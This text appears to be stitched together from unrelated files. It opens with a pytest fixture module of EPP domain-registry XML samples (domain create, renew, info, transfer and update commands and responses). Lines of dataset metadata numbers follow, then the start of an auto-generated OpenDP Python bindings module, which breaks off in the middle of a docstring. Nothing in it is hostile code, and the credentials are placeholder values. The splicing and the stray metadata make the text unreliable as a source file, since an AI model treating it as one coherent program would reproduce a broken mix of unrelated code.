<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithnshostattxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostAttr>
<domain:hostName>ns1.example.com</domain:hostName>
<domain:hostAddr ip="v4">192.168.0.0</domain:hostAddr>
</domain:hostAttr>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithsecdnsxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<extension>
<secDNS:create xmlns:secDNS="urn:ietf:params:xml:ns:secDNS-1.1">
<secDNS:dsData>
<secDNS:keyTag>12345</secDNS:keyTag>
<secDNS:alg>3</secDNS:alg>
<secDNS:digestType>1</secDNS:digestType>
<secDNS:digest>49FD46E6C4B45C55D4AC</secDNS:digest>
</secDNS:dsData>
</secDNS:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<extension>
<launch:create xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>sunrise</launch:phase>
<smd:encodedSignedMark xmlns:smd="urn:ietf:params:xml:ns:signedMark-1.0">YkM1cFkyRnViaTV2Y21jdmRHMWphRjl3YVd4dmRDNWpjbXd3UlFZRFZSMGdCRDR3UERBNkJnTXFBd1F3TXpBeEJnZ3JCZ0VGQlFjQwpBUllsYUhSMGNEb3ZMM2QzZHk1cFkyRnViaTV2Y21jdmNHbHNiM1JmY21Wd2IzTnBkRzl5ZVRBTkJna3Foa2lHOXcwQkFRc0ZBQU9DCkFRRUFLVWZFSjVYNlFBdHRhampSVnNlSkZReFJYR0hUZ0NhRGs4Qy8xbmoxaWVsWkF1WnRnZFVwV0RVcjBObkdDaStMSFNzZ2RUWVIKK3ZNcnhpcjdFVllRZXZyQm9iRUxreGVURWZqRjlGVnFqQkhJbnlQRkxPRmt6MTV6R0cySXdQSnBzK3ZoQWQvN2dUMHBoMWsyRkVrSgpGR0w1THdSZjFtczRJWDB2RGt4VElYOFF4eTFqY3pDaVNzb1Y4cHdsaGgyTkhBa3BHUVdOL3BUUzBVcWk3dVU1Qm0vSW9HdlBCelVwCjVuNVNqVU1uVFp4LysxekF1ZXJTYWJ0NDgzc1hCY1dzamdsN01xRnRmT05pQXROZU1OZmg2MGxUTXU0emdWd0xaVE80VFFNNVEydXkKbFBQbVp0d25BODhRdk0ySUw4NWNJWUpIZDB6OWpwVVFNQkdIWEYyV1FBPT08L2RzOlg1MDlDZXJ0aWZpY2F0ZT48L2RzOlg1MDlEYXRhPjwvZHM6S2V5SW5mbz48L2RzOlNpZ25hdHVyZT48L3NtZDpzaWduZWRNYXJrPg==</smd:encodedSignedMark>
</launch:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createdomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
<domain:hostObj>ns1.example.net</domain:hostObj>
<domain:hostObj>ns2.example.net</domain:hostObj>
</domain:ns>
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:contact type="billing">xxx</domain:contact>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:create>
</create>
<extension>
<brdomain:create xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:organization>005.506.560/0001-36</brdomain:organization>
<brdomain:releaseProcessFlags flag1="1" />
<brdomain:autoRenew active="1" />
</brdomain:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsecreatedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:creData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:crDate>1999-04-03T22:00:00.0Z</domain:crDate>
<domain:exDate>2001-04-03T22:00:00.0Z</domain:exDate>
</domain:creData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsecreatedomaincommandwithbrdomaixmlexpected():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1001'>
<msg>Command completed successfully; action pending</msg>
</result>
<resData>
<domain:creData xmlns:domain='urn:ietf:params:xml:ns:domain-1.0'>
<domain:name>example.com.br</domain:name>
<domain:crDate>2006-01-30T22:00:00.0Z</domain:crDate>
</domain:creData>
</resData>
<extension>
<brdomain:creData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
<brdomain:pending>
<brdomain:doc status='notReceived'>
<brdomain:docType>CNPJ</brdomain:docType>
<brdomain:limit>2006-03-01T22:00:00.0Z</brdomain:limit>
<brdomain:description lang='pt'>Cadastro Nacional da Pessoa Juridica</brdomain:description>
</brdomain:doc>
<brdomain:dns status='queryTimeOut'>
<brdomain:hostName>ns1.example.com.br</brdomain:hostName>
<brdomain:limit>2006-02-13T22:00:00.0Z</brdomain:limit>
</brdomain:dns>
</brdomain:pending>
<brdomain:ticketNumberConc>123451</brdomain:ticketNumberConc>
<brdomain:ticketNumberConc>123455</brdomain:ticketNumberConc>
</brdomain:creData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def deletedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<delete>
<domain:delete xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
</domain:delete>
</delete>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def deletedomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<delete>
<domain:delete xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
</domain:delete>
</delete>
<extension>
<launch:delete xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>sunrise</launch:phase>
<launch:applicationID>abc123</launch:applicationID>
</launch:delete>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsedeletedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def renewdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<renew>
<domain:renew xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com.br</domain:name>
<domain:curExpDate>2000-04-03</domain:curExpDate>
<domain:period unit="y">5</domain:period>
</domain:renew>
</renew>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responserenewdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:renData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:exDate>2005-04-03T22:00:00.0Z</domain:exDate>
</domain:renData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responserenewdomaincommandwithbrdomaixmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:renData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com.br</domain:name>
<domain:exDate>2007-04-03T00:00:00.0Z</domain:exDate>
</domain:renData>
</resData>
<extension>
<brdomain:renData xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:publicationStatus publicationFlag="onHold">
<brdomain:onHoldReason>billing</brdomain:onHoldReason>
<brdomain:onHoldReason>dns</brdomain:onHoldReason>
</brdomain:publicationStatus>
</brdomain:renData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def infodomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<domain:info xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name hosts="all">example.com</domain:name>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:info>
</info>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def infodomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<domain:info xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name hosts="all">example.com</domain:name>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:info>
</info>
<extension>
<launch:info includeMark="true" xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>claims</launch:phase>
<launch:applicationID>abc123</launch:applicationID>
</launch:info>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def infodomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<domain:info xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name hosts="all">example.com</domain:name>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:info>
</info>
<extension>
<brdomain:info xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
</brdomain:info>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responseinfodomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:infData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:roid>EXAMPLE1-REP</domain:roid>
<domain:status s="ok" />
<domain:registrant>jd1234</domain:registrant>
<domain:contact type="admin">sh8013</domain:contact>
<domain:contact type="tech">sh8013</domain:contact>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
<domain:hostObj>ns1.example.net</domain:hostObj>
</domain:ns>
<domain:host>ns1.example.com</domain:host>
<domain:host>ns2.example.com</domain:host>
<domain:clID>ClientX</domain:clID>
<domain:crID>ClientY</domain:crID>
<domain:crDate>1999-04-03T22:00:00.0Z</domain:crDate>
<domain:upID>ClientX</domain:upID>
<domain:upDate>1999-12-03T09:00:00.0Z</domain:upDate>
<domain:exDate>2005-04-03T22:00:00.0Z</domain:exDate>
<domain:trDate>2000-04-08T09:00:00.0Z</domain:trDate>
<domain:authInfo>
<domain:pw>2fooBAR</domain:pw>
</domain:authInfo>
</domain:infData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseinfodomaincommandxmlunauthorizedclient():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:infData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:roid>EXAMPLE1-REP</domain:roid>
<domain:clID>ClientX</domain:clID>
</domain:infData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseinfodomaincommandwithbrdomainxmlexpected():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:infData xmlns:domain='urn:ietf:params:xml:ns:domain-1.0'>
<domain:name>example.com.br</domain:name>
<domain:roid>EXAMPLE1-REP</domain:roid>
<domain:status s='pendingCreate'/>
<domain:contact type='admin'>fan</domain:contact>
<domain:contact type='billing'>fan</domain:contact>
<domain:contact type='tech'>fan</domain:contact>
<domain:ns>
<domain:hostAttr>
<domain:hostName>ns1.example.com.br</domain:hostName>
<domain:hostAddr ip='v4'>192.0.2.1</domain:hostAddr>
</domain:hostAttr>
<domain:hostAttr>
<domain:hostName>ns1.example.net.br</domain:hostName>
</domain:hostAttr>
</domain:ns>
<domain:clID>ClientX</domain:clID>
<domain:crID>ClientX</domain:crID>
<domain:crDate>2006-01-30T22:00:00.0Z</domain:crDate>
<domain:upID>ClientX</domain:upID>
<domain:upDate>2006-01-31T09:00:00.0Z</domain:upDate>
</domain:infData>
</resData>
<extension>
<brdomain:infData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:organization>005.506.560/0001-36</brdomain:organization>
<brdomain:publicationStatus publicationFlag="onHold">
<brdomain:onHoldReason>billing</brdomain:onHoldReason>
<brdomain:onHoldReason>dns</brdomain:onHoldReason>
</brdomain:publicationStatus>
<brdomain:autoRenew active="1"/>
</brdomain:infData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def transferquerydomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<transfer op="query">
<domain:transfer xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:authInfo>
<domain:pw roid="JD1234-REP">2fooBAR</domain:pw>
</domain:authInfo>
</domain:transfer>
</transfer>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def transferrequestdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<transfer op="request">
<domain:transfer xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">1</domain:period>
<domain:authInfo>
<domain:pw roid="JD1234-REP">2fooBAR</domain:pw>
</domain:authInfo>
</domain:transfer>
</transfer>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsetransferquerydomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:trnData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:trStatus>pending</domain:trStatus>
<domain:reID>ClientX</domain:reID>
<domain:reDate>2000-06-06T22:00:00.0Z</domain:reDate>
<domain:acID>ClientY</domain:acID>
<domain:acDate>2000-06-11T22:00:00.0Z</domain:acDate>
<domain:exDate>2002-09-08T22:00:00.0Z</domain:exDate>
</domain:trnData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsetransferrequestdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1001">
<msg>Command completed successfully; action pending</msg>
</result>
<resData>
<domain:trnData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:trStatus>pending</domain:trStatus>
<domain:reID>ClientX</domain:reID>
<domain:reDate>2000-06-08T22:00:00.0Z</domain:reDate>
<domain:acID>ClientY</domain:acID>
<domain:acDate>2000-06-13T22:00:00.0Z</domain:acDate>
<domain:exDate>2002-09-08T22:00:00.0Z</domain:exDate>
</domain:trnData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def updatedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithsecdnsxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<extension>
<secDNS:update urgent="true" xmlns:secDNS="urn:ietf:params:xml:ns:secDNS-1.1">
<secDNS:add>
<secDNS:dsData>
<secDNS:keyTag>12346</secDNS:keyTag>
<secDNS:alg>3</secDNS:alg>
<secDNS:digestType>1</secDNS:digestType>
<secDNS:digest>38EC35D5B3A34B44C39B</secDNS:digest>
</secDNS:dsData>
</secDNS:add>
</secDNS:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithrgpxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<extension>
<rgp:update xmlns:rgp="urn:ietf:params:xml:ns:rgp-1.0">
<rgp:restore op="report">
<rgp:report>
<rgp:preData>Pre-delete registration data goes here. Both XML and free text are allowed.</rgp:preData>
<rgp:postData>Post-restore registration data goes here. Both XML and free text are allowed.</rgp:postData>
<rgp:delTime>2003-07-10T22:00:00.0Z</rgp:delTime>
<rgp:resTime>2003-07-20T22:00:00.0Z</rgp:resTime>
<rgp:resReason>Registrant error.</rgp:resReason>
<rgp:statement>This registrar has not restored the Registered Name in order to assume the rights to use or sell the Registered Name for itself or for any third party.</rgp:statement>
<rgp:statement lang="en">The information in this report is true to best of this registrar knowledge, and this registrar acknowledges that intentionally supplying false information in this report shall constitute an incurable material breach of the Registry-Registrar Agreement.</rgp:statement>
<rgp:other>Supporting information goes here.</rgp:other>
</rgp:report>
</rgp:restore>
</rgp:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<extension>
<launch:update xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>sunrise</launch:phase>
<launch:applicationID>abc123</launch:applicationID>
</launch:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>teste.com.br</domain:name>
</domain:update>
</update>
<extension>
<brdomain:update xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:ticketNumber>ab-1234</brdomain:ticketNumber>
<brdomain:chg>
<brdomain:releaseProcessFlags flag1="1" />
<brdomain:autoRenew active="1" />
<brdomain:publicationStatus>onHold</brdomain:publicationStatus>
</brdomain:chg>
</brdomain:update>
</extension>
</command>
</epp>
"""
@pytest.fixture
def responseupdatedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseupdatedomaincommandwithbrdomainxmlexpected_case1():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<extension>
<brdomain:updData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
<brdomain:pending>
<brdomain:doc status='notReceived'>
<brdomain:docType>CNPJ</brdomain:docType>
<brdomain:limit>2006-03-01T22:00:00.0Z</brdomain:limit>
<brdomain:description lang='pt'>Cadastro Nacional da Pessoa Juridica</brdomain:description>
</brdomain:doc>
</brdomain:pending>
</brdomain:updData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseupdatedomaincommandwithbrdomainxmlexpected_case2():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='2308'>
<msg>Data management policy violation</msg>
<extValue>
<value xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:hostName>ns2.example.com</domain:hostName>
</value>
<reason>Query refused</reason>
</extValue>
</result>
<extension>
<brdomain:updData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:hostStatus>
<brdomain:hostName>ns2.example.com</brdomain:hostName>
<brdomain:dnsAnswer>Query refused</brdomain:dnsAnswer>
</brdomain:hostStatus>
<brdomain:publicationStatus publicationFlag="onHold">
<brdomain:onHoldReason>billing</brdomain:onHoldReason>
<brdomain:onHoldReason>dns</brdomain:onHoldReason>
</brdomain:publicationStatus>
</brdomain:updData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
| 32.706781
| 889
| 0.637455
| 3,867
| 34,244
| 5.64391
| 0.090251
| 0.028225
| 0.052417
| 0.064513
| 0.782772
| 0.767469
| 0.755464
| 0.745017
| 0.73709
| 0.716747
| 0
| 0.047161
| 0.199363
| 34,244
| 1,046
| 890
| 32.73805
| 0.748878
| 0
| 0
| 0.823893
| 0
| 0.08033
| 0.905034
| 0.469367
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038105
| false
| 0
| 0.00309
| 0.037075
| 0.0793
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
66710c7b51600d8ba1ac6a0a1058f23b25814d14
| 36,197
|
py
|
Python
|
python/src/opendp/trans.py
|
orespo/opendp
|
ba595c7b2a0c1e4240cbcf41bf358efff76988f1
|
[
"MIT"
] | null | null | null |
python/src/opendp/trans.py
|
orespo/opendp
|
ba595c7b2a0c1e4240cbcf41bf358efff76988f1
|
[
"MIT"
] | null | null | null |
python/src/opendp/trans.py
|
orespo/opendp
|
ba595c7b2a0c1e4240cbcf41bf358efff76988f1
|
[
"MIT"
] | null | null | null |
# Auto-generated. Do not edit.
from opendp._convert import *
from opendp._lib import *
from opendp.mod import *
from opendp.typing import *
__all__ = [
"make_cast",
"make_cast_default",
"make_is_equal",
"make_is_null",
"make_cast_inherent",
"make_cast_metric",
"make_clamp",
"make_unclamp",
"make_count",
"make_count_distinct",
"make_count_by",
"make_count_by_categories",
"make_split_lines",
"make_split_records",
"make_create_dataframe",
"make_split_dataframe",
"make_select_column",
"make_identity",
"make_impute_constant",
"make_impute_uniform_float",
"make_sized_bounded_mean",
"make_resize",
"make_bounded_resize",
"make_bounded_sum",
"make_sized_bounded_sum",
"make_sized_bounded_variance"
]
def make_cast(
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that casts a vector of data from type `TIA` to type `TOA`.
Failure to parse results in None, else Some<TOA>.
:param TIA: atomic input data type to cast from
:type TIA: RuntimeTypeDescriptor
:param TOA: atomic data type to cast into
:type TOA: RuntimeTypeDescriptor
:return: A cast step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TOA), Transformation))
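# Example (editorial sketch, not part of the generated bindings). Assumes the
# "contrib" feature has been enabled via opendp.mod.enable_features("contrib")
# and that Transformation objects are callable on data in this OpenDP version:
#   caster = make_cast(TIA="String", TOA="i32")
#   caster(["1", "2", "not a number"])   # -> [1, 2, None]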
def make_cast_default(
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that casts a vector of data from type `TIA` to type `TOA`. If cast fails, fill with default.
